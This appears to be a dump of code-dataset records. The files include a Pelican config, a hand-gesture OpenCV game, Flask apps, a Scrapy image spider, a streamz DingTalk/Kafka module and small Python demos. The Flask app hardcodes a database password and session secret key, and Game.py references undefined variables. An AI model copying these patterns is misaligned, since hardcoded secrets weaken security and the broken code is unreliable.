conn.cursor()\n cursor.execute(SEARCHALLCOMMENT,())\n datas=cursor.fetchall()\n conn.commit()\n conn.close()\n return datas\n","sub_path":"flask/app/Blogmodel.py","file_name":"Blogmodel.py","file_ext":"py","file_size_in_byte":7313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"178063575","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\nimport os\nAUTHOR = 'Will Sorenson'\nSITENAME = 'Analytical Sense'\nSITEURL = 'http://localhost:8000'\n\nPATH = 'content'\nNOTEBOOK_DIR = 'notebooks'\nEXTRA_HEADER = open('_nb_header.html').read().decode('utf-8')\n\nTIMEZONE = 'Europe/Paris'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'))\n\n\nDEFAULT_PAGINATION = 5\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n\nTHEME = '/Users/Will/Devel/pelican-bootstrap3'\n\nGITHUB_USER ='Will-So'\nGITHUB_SKIP_FORK = True\n\n#SOCIAL = (('github', 'http://github.com/Will-So')) # Gives an error for some reason\n\n#DIRECT_TEMPLATES = ('index', 'categories', 'authors', 'archives', 'search')\n\nTAG_CLOUD_MAX_ITEMS = 10\n\nDISPLAY_CATEGORIES_ON_MENU = False\n\nDISPLAY_TAGS_ON_SIDEBAR = True\n\n# PLUGIN_PATHS = [os.path.join(os.environ.get('HOME'),\n# 'Devel/2_tech_blog/pelican-plugins')]\n\nPLUGIN_PATHS = [os.path.join(os.environ.get('HOME'),\n 'Devel/2_tech_blog/pelican-plugins')]\n\nPLUGINS = ['liquid_tags.img', 'liquid_tags.video',\n 'liquid_tags.youtube', 'liquid_tags.vimeo',\n 'liquid_tags.include_code', 'tipue_search',\n 'liquid_tags.notebook']\n\n\n\n#DISQUS_SITENAME = 
'analyticalsense'","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"381734123","text":"\n#NEEDE IMPORTS\n#######################################################################################################################################\nimport torch\nimport time\nimport cv2\nimport numpy as np\nimport mediapipe as mp\nfrom statistics import mode\nimport handtracking as hd\nimport animal_figures as af\nfrom pet_food import Pet_food\nfrom user import User\nimport helpers as hp\nimport prediction_model as pfm\n\n\nimport mediapipe as mp\nimport cv2\nimport numpy as np\nfrom menu_buttons import buttons\nimport helpers as hp\nfrom play_button import play\nglobal_time = time.time()\n# org = (20, 30)\nfontScale = 0.7\ncolor = (0, 255, 0)\nthickness = 2\nCHANGE_INTERVAL = 3\n\n\n# Media_pipe requirements\nmp_drawing = mp.solutions.drawing_utils\nmp_hands = mp.solutions.hands\n\ngame_status = 0\nexit_status = 0\nhelp_status = 0\ncap = cv2.VideoCapture(0)\n\n\nresponse, frame = cap.read()\n\n\n#call the class by giving dimensions and name of the buttons\nStart = buttons((frame.shape[0]//4, frame.shape[1]//2), 'Start')\nHelp = buttons((frame.shape[0]//4+80, frame.shape[1]//2), 'Help')\nExit = buttons((frame.shape[0]//4+160, frame.shape[1]//2), 'Exit')\n\n################################################################################\n# model = torch.load('../saved_models/best_acc_model4.pth', map_location='cpu')\nmodel = torch.load('../RESNET/2Resnet_gestures_epoch9.pth', map_location='cpu')\nFRAME_COUNTER = 50\npredictions_list = []\nstate = 'idle'\nplayer.status = 'wait'\n\n\n\n\nwhile True:\n success,frame=cap.read()\n frame=cv2.flip(frame,4)\n image=detector.findHands(frame)\n list=detector.findPosition(image,draw=False)\n if len(list)!=0:\n x=[ list[x][1] for x in range(len(list)) ]\n y=[ list[x][2] for x in range(len(list)) ]\n hc=int(np.average(x)+np.average(x)*0.02),int(np.average(y)+np.average(y)*0.031)\n img=af.draw_dog(list,image)\n img = cv2.circle(image, (0, 0), 20, (0, 255, 0), -1)\n img = cv2.circle(image, (0, image.shape[0]), 20, (0, 0, 255), -1)\n img = cv2.circle(image, (image.shape[1], 0), 20, (255, 0, 0), -1)\n img = cv2.circle(image, (image.shape[1], image.shape[0]), 20, (255, 255, 255), -1)\n\n if game_status == 0:\n #draw the buttons\n\n Start.draw_button(image)\n Help.draw_button(image)\n Exit.draw_button(image)\n\n #condition for index finger to touch play button\n if Start.position[1]-Start.axesLength[0]<=index_fing_x<=Start.position[1] + Start.axesLength[0] \\\n and Start.position[0]-Start.axesLength[1]<=index_fing_y<=Start.position[0] + Start.axesLength[1]:\n game_status = 1\n\n #condition for index finger to touch exit and Quit button\n if Exit.position[1]-Exit.axesLength[0]<=index_fing_x<=Exit.position[1] + Exit.axesLength[0] \\\n and Exit.position[0]-Exit.axesLength[1]<=index_fing_y<=Exit.position[0] + Exit.axesLength[1]:\n exit_status = 1\n\n #condition for index finger to touch exit button\n if Help.position[1]-Help.axesLength[0]<=index_fing_x<=Help.position[1] + Help.axesLength[0] \\\n and Help.position[0]-Help.axesLength[1]<=index_fing_y<=Help.position[0] + Help.axesLength[1]:\n help_status = 1\n\n if game_status == 1:\n image, game_status = play(vc, response, hc, image, index_fing_x, index_fing_y) #play the game\n elif exit_status == 1:\n exit()\n elif help_status == 1:\n print('I am helping you')\n\n\n\n 
cv2.imshow('Frame', frame)\n key = cv2.waitKey(1)\n if key == 27:\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"Projects/Build_week_3/GUI/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"497964030","text":"from flask import Flask, request, redirect, render_template, flash, url_for, json, make_response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_bcrypt import Bcrypt\n\nfrom flask_googlemaps import GoogleMaps\nfrom models.user import User\nimport os\n\n# app and db dev environment settings:\n######################################\ndb_uri = 'mysql+pymysql://sleep-safe:sleep-safe@localhost:8889/sleep-safe'\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = db_uri\napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'ZAj08N/$3m]XHjHy!rX R/~?X,9RW@UL'\n\nbcrypt = Bcrypt(app)\ndb = SQLAlchemy(app)\n\n# routes:\n# all routes get a decorator `@app.route` that takes at least one parameter - the url. \n# optional parameter: HTTP request types go here too. if left blank it defaults to a \"GET\" request\n####################################################################################################\n\n# Sleep Safe landing page - accessed at localhost:5000 for now\n@app.route(\"/\", methods=['GET'])\ndef index():\n ''' displays the Sleep Safe landing page '''\n return render_template('index.html')\n\n@app.route(\"/site\", methods=['GET'])\ndef location_detail():\n ''' displays the location detail page about the site selected by the user '''\n return render_template('location.html')\n\n# runs the app, always the last line\nif __name__ == '__main__':\n app.run(threaded = True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"467803937","text":"def bubble_sort(li):\n for i in range(len(li)-1):\n exchange = False\n for j in range(len(li)-i-1):\n if li[j] > li[j+1]:\n exchange = True\n li[j], li[j+1] = li[j+1], li[j]\n if not exchange:\n return li\n return li\n\nlist1 = [1,7,6,3,7,1,6,9]\nprint(bubble_sort(list1))","sub_path":"Algorithm_Basic/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"167688966","text":"from selenium import selenium\nimport unittest, time, re\n\nclass add_1st_event(unittest.TestCase):\n def setUp(self):\n self.verificationErrors = []\n self.selenium = selenium(\"localhost\", 4444, \"*chrome\", \"http://change-this-to-the-site-you-are-testing/\")\n self.selenium.start()\n \n def test_add_1st_event(self):\n sel = self.selenium\n sel.open(\"/tasks/\")\n sel.click(\"link=Add Events\")\n sel.wait_for_page_to_load(\"30000\")\n sel.type(\"id_name\", \"Event 1\")\n sel.type(\"id_location\", \"Event location\")\n sel.type(\"id_description\", \"event description\")\n sel.click(\"//input[@value='submit']\")\n sel.wait_for_page_to_load(\"30000\")\n \n def tearDown(self):\n self.selenium.stop()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"add_1st_event.py","file_name":"add_1st_event.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
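# Illustrative sketch (added here, not one of the dataset records): the Game.py record above
# reads index_fing_x/index_fing_y without ever defining them. With MediaPipe's 21-point hand
# model the index fingertip is landmark id 8, so given an (id, x, y) landmark list of the kind
# handtracking-style findPosition() helpers usually return (an assumption here), the missing
# coordinates would typically be recovered like this:
landmarks = [(0, 320, 240), (8, 350, 200)]          # hypothetical (id, x, y) entries
index_fing_x, index_fing_y = next(
    (x, y) for lid, x, y in landmarks if lid == 8)  # landmark 8 = index fingertip
print(index_fing_x, index_fing_y)                   # -> 350 200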
+{"seq_id":"81884438","text":"import time\nimport busio\nimport board\n\nclass ESPNEW:\n def __init__(self, baud=115200):\n self.s=busio.UART(board.TX, board.RX, baudrate=baud)\n time.sleep(0.1)\n self.reset()\n self.s.read(self.s.in_waiting)\n time.sleep(0.1)\n\n def buildJSON(self, func, data):\n toSend=b'${\"f\":\"'+func+b'\",\"d\":['\n for d in data:\n toSend =toSend+b'\"'+d +b'\",'\n toSend=toSend+b']}&'\n print(toSend)\n return toSend\n\n def storeapi(self,api, URL):\n toSend=b'dongle.storeAPISecret(\"'+api+b'\",\"'+ URL + b'\")\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def storewifi(self,ssid,password):\n toSend=b'dongle.storeWIFISecret(\"'+ssid+b'\",\"'+ password + b'\")\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n \n def getTW(self):\n self.send()\n return(self.s.read())\n\n def putTW(self, thing, prop, value):\n toSend=b'dongle.PutTW(\"'+thing+b'\",\"'+ prop +b'\",\"'+ value +b'\")\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def setwifi(self):\n toSend=b'dongle.setWiFi()\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def setTW(self):\n toSend=b'dongle.setTW()\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def callTW(self):\n toSend=b'dongle.CallTW(\"Test1\",\"TestService\")\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def getMAC(self):\n toSend=b'dongle.getMAC()\\r\\n'\n self.send(toSend)\n ret=self.clean_return()\n return(ret)\n\n def reset(self):\n toSend=b'import dongle\\r\\n'\n self.send(toSend)\n return(self.s.read(self.s.in_waiting))\n\n def read(self):\n return(self.s.read())\n\n def send(self,body):\n while (len(body)>15):\n self.s.write(body[:15])\n body=body[15:]\n time.sleep(0.1)\n self.s.write(body) \n time.sleep(0.1)\n #ret=self.clean_return()\n #return(ret)\n\n\n def clean_return(self):\n \n while not (self.s.in_waiting) :\n pass\n time.sleep(0.1)\n ret=self.s.read()\n now= time.monotonic()\n start=time.monotonic()\n while ((now-start)<2 and not ('!!' in ret)):\n now= time.monotonic()\n if(self.s.in_waiting) :\n ret = ret + self.s.read()\n time.sleep(0.1)\n ret=str(ret)\n print(ret)\n ret = ret[ret.index(\"@\") + 6 : ret.index(\"!\") - 4]\n if (ret is None):\n return (0)\n else :\n return(ret)\n #if(self.s.in_waiting):\n # raw_ret=self.s.read()\n # print(raw_ret)\n #print(str(raw_ret).find(\">>>\"))\n #i=0\n # while str(raw_ret).find(\">>>\")<0:\n # if(i>15):\n # break\n # raw_ret+=self.s.read(400)\n # i=i+1\n # print(str(raw_ret)[str(raw_ret).find(\"\\r\\n\"):str(raw_ret).find(\"\\r\\n>>>\")])\n # return(str(raw_ret)[str(raw_ret).find(\"\\r\\n\"):str(raw_ret).find(\"\\r\\n>>>\")])\n # time.sleep(0.1)\n\n#Key = \"pp92f871d8-c3bd-4fd7-8fab-ee50e1fbd0e5\"\n#urlBase = \"https://-2008281301ci.portal.ptc.io:8443/Thingworx/\"","sub_path":"8266 Dongle/Xiao /wifi.py","file_name":"wifi.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"353922717","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport math\nimport pickle, gzip, numpy\nfrom PIL import Image\n\n\nwith gzip.open(\"test.pkl.gz\", \"rb\") as f:\n index_i = 0 # Index of MNIST image data\n train_set, valid_set, test_set = pickle.load(f, encoding=\"latin1\") # Extract images from pickle.\n one_mat = train_set[0][index_i] # Separate an image (directed by index_i) from whole images for training.\n size = int(math.sqrt(len(one_mat))) # Calc images size. 
(Assumes images are square)\n print(one_mat, len(one_mat), math.sqrt(len(one_mat)))\n splited_mat = [list(255 * one_mat[i : i + size]) for i in range(0, len(one_mat), size)] # Format the image. ([Pixel, Pixel, Pixel, ...] -> [[Pixel, Pixel, ...], [Pixel, Pixel, ...], ....])\n ttt = numpy.around(splited_mat) # Convert array elements into integers.\n img = Image.fromarray(ttt) # Build an image from the matrix.\n img.show() # Show the image.\n f.close()\n","sub_path":"Lorder.py","file_name":"Lorder.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"412039647","text":"'''\nCreated on Jan 24, 2013\nDemonstrates a menu.\nThis does not work on Mac; I looked for a solution on the web but found none.\n@author: rduvalwa2\n'''\nfrom tkinter import *\n\nclass Application(Frame):\n def __init__(self, master=None):\n Frame.__init__(self, master=None)\n self.configure(height=75, width=75)\n # create a menu bar\n menu = Menu(root)\n root.config(menu=menu)\n \n filemenu = Menu(menu)\n menu.add_cascade(label=\"File\", menu=filemenu)\n filemenu.add_command(label=\"New\", command=self.callback1)\n filemenu.add_command(label=\"Open...\", command=self.callback2)\n filemenu.add_separator()\n filemenu.add_command(label=\"Exit\", command=self.callback3)\n \n helpmenu = Menu(menu)\n menu.add_cascade(label=\"Help\", menu=helpmenu)\n helpmenu.add_command(label=\"About...\", command=self.callback4)\n\n self.pack()\n\n def callback1(self):\n print(\"You selected 'File | New'\")\n \n def callback2(self):\n print(\"You selected 'File | Open...'\")\n \n def callback3(self):\n print(\"You selected 'File | Exit'\")\n self.quit()\n \n def callback4(self):\n print(\"You selected 'Help | About...'\")\n\nroot = Tk()\napp = Application(master=root)\napp.mainloop()\n","sub_path":"PythonHomeWork/Py2/Py2_Lessons/src/menudemo.py","file_name":"menudemo.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"181400879","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nfrom uumnt.items import UumntItem\n\nclass UumntspiderSpider(scrapy.Spider):\n name = \"uumntspider\"\n allowed_domains = [\"uumnt.com\"]\n start_urls = []\n \n start_urls.append('http://www.uumnt.com/meinv')\n for i in range(2,411):\n start_urls.append('http://www.uumnt.com/meinv/list_{}.html'.format(str(i)))\n\n def parse(self, response):\n atlas_list = response.xpath('//div[@id=\"mainbodypul\"]/div')\n print('This page has {} galleries'.format(len(atlas_list)))\n for list in atlas_list:\n atlas_name = list.xpath('./a/@title').extract()[0]\n atlas_url = 'https://www.uumnt.com' + list.xpath('./a/@href').extract()[0]\n print('Gallery {} is at {}'.format(atlas_name,atlas_url))\n yield scrapy.Request(atlas_url, meta={'name':atlas_name}, callback = self.get_every_atlas_images)\n\n\n def get_every_atlas_images(self, response):\n print('Entering gallery.................................................')\n total = response.xpath('//div[@class=\"page\"]/a[last()]/@href').extract()[0]\n total_num = re.findall(r'(\\d+)\\.html$',total)[0]\n print('This gallery has {} images'.format(int(total_num)))\n for i in range(1,int(total_num)+1):\n subfix = re.findall(r'(\\d+).html$',response.url)[0] + '_' + str(i) + '.html'\n middle = re.findall(r'(\\w+)\\/\\d+\\.html$',response.url)[0]\n pic_url = 'https://www.uumnt.com/' + middle + '/' + subfix\n print('Image page URL: {}'.format(pic_url))\n yield scrapy.Request(pic_url,meta={'name':response.meta['name']},callback=self.get_every_image)\n\n\n def get_every_image(self, response):\n print('Downloading image..................................................')\n item = UumntItem()\n item['name'] = response.meta['name']\n image_urls = response.xpath('//div[@class=\"bg-white p15 center imgac clearfix\"]/a/img/@src').extract()\n for image_url in image_urls:\n item['image_url'] = image_url\n yield item\n","sub_path":"uumnt/uumnt/spiders/uumntspider.py","file_name":"uumntspider.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"275625743","text":"from tornado import gen\nfrom tornado.httpclient import HTTPRequest, HTTPError\nfrom tornado.httpclient import AsyncHTTPClient\n\nfrom .pipe import passed\nfrom .core import Stream\nfrom .topic import RedisStream\nfrom .namespace import NB\nfrom pymaybe import maybe\nimport json\n\n\n@Stream.register_api()\nclass to_kafka(Stream):\n \"\"\" Writes data in the stream to Kafka\n\n This stream accepts a string or bytes object. Call ``flush`` to ensure all\n messages are pushed. Responses from Kafka are pushed downstream.\n\n Parameters\n ----------\n topic : string\n The topic which to write\n producer_config : dict\n Settings to set up the stream, see\n https://docs.confluent.io/current/clients/confluent-kafka-python/#configuration\n https://github.com/edenhill/librdkafka/blob/master/CONFIGURATION.md\n Examples:\n bootstrap.servers: Connection string (host:port) to Kafka\n\n Examples\n --------\n >>> from streamz import Stream\n >>> ARGS = {'bootstrap.servers': 'localhost:9092'}\n >>> source = Stream()\n >>> kafka = source.map(lambda x: str(x)).to_kafka('test', ARGS)\n \n >>> for i in range(10):\n ... source.emit(i)\n >>> kafka.flush()\n \"\"\"\n\n def __init__(self, upstream, topic, producer_config, **kwargs):\n import confluent_kafka as ck\n\n self.topic = topic\n self.producer = ck.Producer(producer_config)\n\n Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)\n self.stopped = False\n self.polltime = 0.2\n self.loop.add_callback(self.poll)\n self.futures = []\n\n @gen.coroutine\n def poll(self):\n while not self.stopped:\n # executes callbacks for any delivered data, in this thread\n # if no messages were sent, nothing happens\n self.producer.poll(0)\n yield gen.sleep(self.polltime)\n\n def update(self, x, who=None):\n future = gen.Future()\n self.futures.append(future)\n\n @gen.coroutine\n def _():\n while True:\n try:\n # this runs asynchronously, in C-K's thread\n self.producer.produce(self.topic, x, callback=self.cb)\n return\n except BufferError:\n yield gen.sleep(self.polltime)\n except Exception as e:\n future.set_exception(e)\n return\n\n self.loop.add_callback(_)\n return future\n\n @gen.coroutine\n def cb(self, err, msg):\n future = self.futures.pop(0)\n if msg is not None and msg.value() is not None:\n future.set_result(None)\n yield self._emit(msg.value())\n else:\n future.set_exception(err or msg.error())\n\n def flush(self, timeout=-1):\n self.producer.flush(timeout)\n\n\n@Stream.register_api()\nclass to_redis(Stream):\n\n def __init__(self, topic, upstream=None, max_len=100, **kwargs):\n Stream.__init__(self, upstream=upstream, ensure_io_loop=True)\n self.rs = RedisStream(topic=topic, max_len=max_len)\n self >> self.rs\n\n\n# Wrapper class for a custom DingTalk group bot\nclass Dtalk(Stream):\n \"\"\"DingTalk group robot.\"\"\"\n\n def __init__(self, webhook=None, secret=None, log=passed, max_retries=3, asynchronous=True, **kwargs):\n # todo: implement a synchronous Dtalk\n self.log = log\n super(Dtalk, self).__init__(ensure_io_loop=True, **kwargs)\n\n self.client = AsyncHTTPClient()\n self.secret = secret\n self.webhook = webhook\n if not webhook:\n self.webhook = maybe(NB('dtalk'))['test']['webhook'].or_else(None)\n self.secret = maybe(NB('dtalk'))['test']['secret'].or_else(None)\n if not self.webhook:\n raise Exception(\"\"\"please input a webhook, or set a default webhook and secret to NB(\"dtalk\")[\"test\"] like this:\n NB('dtalk')['test']['webhook']='https://oapi.dingtalk.com/robot/send?access_token=xxx'\n NB('dtalk')['test']['secret']='SEC085714c31cxxxxxxx'\n \"\"\")\n\n # text message type\n\n def get_sign_url(self,):\n if self.secret:\n import time\n import hmac\n import hashlib\n import base64\n import urllib\n timestamp = int(round(time.time() * 1000))\n secret_enc = self.secret.encode('utf-8')\n string_to_sign = '{}\\n{}'.format(timestamp, self.secret)\n string_to_sign_enc = string_to_sign.encode('utf-8')\n hmac_code = hmac.new(secret_enc, string_to_sign_enc,\n digestmod=hashlib.sha256).digest()\n sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))\n url = self.webhook+f'&timestamp={timestamp}&sign={sign}'\n else:\n url = self.webhook\n\n return url\n\n @gen.coroutine\n def emit(self, msg: str, asynchronous=False) -> dict:\n yield self.post(msg, self.log)\n\n @gen.coroutine\n def post(self, msg: str, log: Stream) -> dict:\n # bytes and set values must be converted before JSON encoding\n if isinstance(msg, bytes) or isinstance(msg, set):\n msg = str(msg)\n data = {\"msgtype\": \"text\", \"text\": {\"content\": msg},\n \"at\": {\"atMobiles\": [], \"isAtAll\": False}}\n if isinstance(msg, str) and '@all' in msg:\n data = {\"msgtype\": \"text\", \"text\": {\"content\": msg},\n \"at\": {\"atMobiles\": [], \"isAtAll\": True}}\n elif isinstance(msg, str) and msg.startswith('@md@'):\n # e.g. @md@CLS news digest|text\n content = msg[4:]\n title, text = content[:content.index(\n '|')], content[content.index('|')+1:]\n data = {\n \"msgtype\": \"markdown\",\n \"markdown\": {\"title\": title, \"text\": text}\n }\n\n post_data = json.JSONEncoder().encode(data)\n\n headers = {'Content-Type': 'application/json'}\n\n url = self.get_sign_url()\n\n request = HTTPRequest(\n url,\n body=post_data,\n method=\"POST\",\n headers=headers,\n validate_cert=False)\n # validate_cert=False works around server SSL issues\n try:\n # response = yield self.retry_client.fetch(request)\n response = yield self.client.fetch(request)\n result = json.loads(response.body.decode('utf-8'))\n except HTTPError as e:\n result = f\"send dtalk error,msg:{data},{e}\"\n\n return {'class': 'Dtalk',\n 'msg': msg,\n 'webhook': self.webhook,\n 'result': result,\n } >> log\n\n def send(self, msg):\n from .core import sync\n return sync(self.loop, self.emit, msg)\n\n\nif __name__ == '__main__':\n 123 >> Dtalk()\n","sub_path":"build/lib/deva/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":6871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"618821432","text":"\nimport getopt\nimport sys\n\ndef Usage():\n print(\"{0} [-h|--help] [-l xxx|--list=xxx] [-d xx|--demo=xx] [-c xxx|--config=xxx] [-m xx|--module=xx]\".format(sys.argv[0]))\n\ntry:\n options,args=getopt.getopt(sys.argv[1:],\"hl:d:c:m:\",[\"help\",\"list=\",\"demo=\",\"config=\",\"module=\"])\nexcept getopt.GetoptError as e:\n print(\"error\",e)\n Usage()\n sys.exit(0)\n\nfor name,values in options:\n if name in (\"-h\",\"--help\"):\n Usage()\n if name in (\"-l\",\"--list\"):\n print(\"-l|--list value for {}\".format(values))\n print(\"######end list######\")\n if name in (\"-d\",\"--demo\"):\n 
print(\"-d|--demo value for {}\".format(values))\n print(\"#######end demo#######\")\n if name in (\"-c\",\"--config\"):\n print(\"-c|--config value for {}\".format(values))\n print(\"#######end config##########\")\n if name in (\"-m\",\"--module\"):\n print(\"-m|--module value for {}\".format(values))\n print(\"########end module###########\")\n\nprint(\"args for {}\".format(args))\n\n\"\"\"\n-m|--machine stand for short(abbreviation)/long(full name) selectable parameter\naction: store/store_true/store_false how to deal with variable\ndest: variable name,default for full parameter name\ntype: string/int parameter store type \n\"\"\"\nfrom optparse import OptionParser\nparser = OptionParser(usage=\"%prog [options]\")\nparser.add_option(\"-m\", \"--machine\", action=\"store\", type=\"string\", dest=\"machine\", help=\"the machine to be check\")\n(options, args) = parser.parse_args()\nif options.machine:\n print(options.machine)\n\nfrom optparse import OptionParser\n\nparser = OptionParser(usage=\"usage:%prog [optinos] filepath\")\nparser.add_option(\"-t\", \"--timeout\",\n action=\"store\",\n type='int',\n dest=\"timeout\",\n default=None,\n help=\"Specify annalysis execution time limit\"\n )\nparser.add_option(\"-u\", \"--url\",\n action=\"store_true\",\n dest=\"url\",\n default=False,\n help=\"Specify if the target is an URL\"\n )\n(options, args) = parser.parse_args()\n\nif options.url:\n print(args[0])\nprint(options.timeout)\n","sub_path":"Python_Demo/getopt_parser.py","file_name":"getopt_parser.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"542844096","text":"#encoding: utf-8\n#autor: Allan Sánchez Iparrazar\n#Combinador de colores\n\ndef buscarEmpate(colorA,colorB):\n if colorB == \"rojo\" and colorA == \"rojo\" : \n error = 1\n elif colorB == \"azul\" and colorA == \"azul\":\n error = 1\n \n elif colorB == \"amarillo\" and colorA == \"amarillo\":\n error = 1\n \n else : \n error = 0\n \n return error\n \ndef buscarError (color):\n if color == \"azul\" or color == \"rojo\" or color == \"amarillo\" :\n error = 1\n else :\n error = 0\n \n return error\n \n \ndef combinarColores(colorA,colorB):\n if colorA == \"azul\" and colorB == \"amarillo\" :\n color = \"VERDE\" \n elif colorA == \"amarillo\" and colorB == \"azul\" :\n color = \"VERDE\"\n \n \n elif colorA == \"rojo\" and colorB == \"azul\" :\n color = \"MORADO\"\n elif colorA == \"azul\" and colorB==\"rojo\" :\n color = \"MORADO\"\n \n elif colorA == \"rojo\" and colorB == \"amarillo\" :\n color = \"NARANJA\"\n elif colorA == \"amarillo\" and colorB == \"rojo\" :\n color = \"NARANJA\"\n \n return color\n\n\n\ndef main ():\n color1 = input(\"Ingresa un color; azul, amarillo o rojo\")\n colorA = color1.lower()\n \n color2 = input(\"Ingresa otro color; azul, amarillo o rojo\")\n colorB = color2.lower()\n#--------------------------------------------------------------------\n\n \n empate = buscarEmpate(colorA,colorB)\n \n if empate == 0 : \n error = buscarError (colorA and colorB)\n \n if error == 1: \n combinacion = combinarColores (colorA,colorB)\n print(\"La combinación de los colores da \",combinacion)\n \n \n \n \n \n else : \n print(\"Ingresa un color válido\")\n else : \n print(\"Ingresaste el mismo color\")\n \n \n \n \n \n\n\nmain()","sub_path":"colores.py","file_name":"colores.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
+{"seq_id":"586216848","text":"from turtle import *\nimport turtle\n\nturtle.hideturtle()\n# turtle.bgcolor('black')\nturtle.color('black')\nturtle.speed(0)\nturtle.delay(0)\n\nturtle.pensize(0.2)\nturtle.setup (width=1200, height=1000, startx=0, starty=0)\nturtle.pu()\nturtle.goto(-480, -100)\nturtle.pd()\nls = [60, -120, 60, 0]\ndef koch_curve(size, recursive_steps, ls):\n\tif recursive_steps > 0:\n\t\tfor i in range(len(ls)):\n\t\t\tkoch_curve(size, recursive_steps-1, [i for i in ls])\n\t\t\tturtle.left(ls[i])\n\n\telse:\n\t\tturtle.forward(size)\n\nkoch_curve(1.3, 6, ls)\nturtle_screen = turtle.getscreen()\nturtle_screen.getcanvas().postscript(file=\"koch_snowflake6.eps\", colormode = 'color')\nturtle.exitonclick()\n\n# 50, 2","sub_path":"koch_snowflake.py","file_name":"koch_snowflake.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"534149797","text":"from flask import Flask, redirect, url_for, request, render_template, jsonify, current_app\nfrom flask_admin import Admin, AdminIndexView, expose, BaseView, expose\nfrom flask_admin.base import MenuLink\nfrom libs.model_view import ModelView\nfrom db import db\nfrom flask_babelex import Babel\nfrom werkzeug.utils import secure_filename\nimport os\nimport xlrd\nfrom models.curso import Curso\nfrom models.colegio import Colegio\nfrom models.asignatura import Asignatura\nfrom models.profesor import Profesor\nfrom models.alumno import Alumno\nfrom models.apoderado import Apoderado\nfrom models.evaluacion import Evaluacion\nfrom models.administrador import Administrador\nfrom models.direccion import Direccion\nfrom models.region import Region\nfrom models.ciudad import Ciudad \nfrom models.comuna import Comuna\nfrom models.topico import Topico\nfrom models.prueba import Prueba\nfrom models.alerta import Alerta\nfrom models.observacion import Observacion,ObservacionProfesor\nfrom models.asistencia import Asistencia\nfrom models.justificacion import Justificacion\nfrom models.anotacion import Anotacion\nfrom models.evento import Evento\nfrom models.archivo import Archivo\nfrom models.video import Video\n\ndef create_app(config=\"config.cfg\"):\n app = Flask(__name__)\n app.config.from_pyfile(config)\n babel = Babel(app)\n db.init_app(app)\n admin = Admin(app, name='PreuApp', template_mode='bootstrap3')\n @babel.localeselector\n def get_locale():\n return \"es\"\n\n return app, admin\n\napp, admin = create_app()\n\nclass ViewWithMethodViews(BaseView):\n @expose('/', methods=[\"POST\", \"GET\"])\n def index(self):\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n return \"

Debe enviar un archivo

\"\n file = request.files['file']\n if file.filename == '':\n return \"

Debe enviar un archivo

\"\n if not \".xls\" in file.filename:\n return \"

El archivo debe ser un excel

\"\n if file:\n filename = secure_filename(file.filename)\n filename = filename\n filepath = os.path.join(\"/tmp\", filename)\n file.save(filepath)\n url_path = url_for('.process_file', filename=filename)\n return \"

Procesar excel


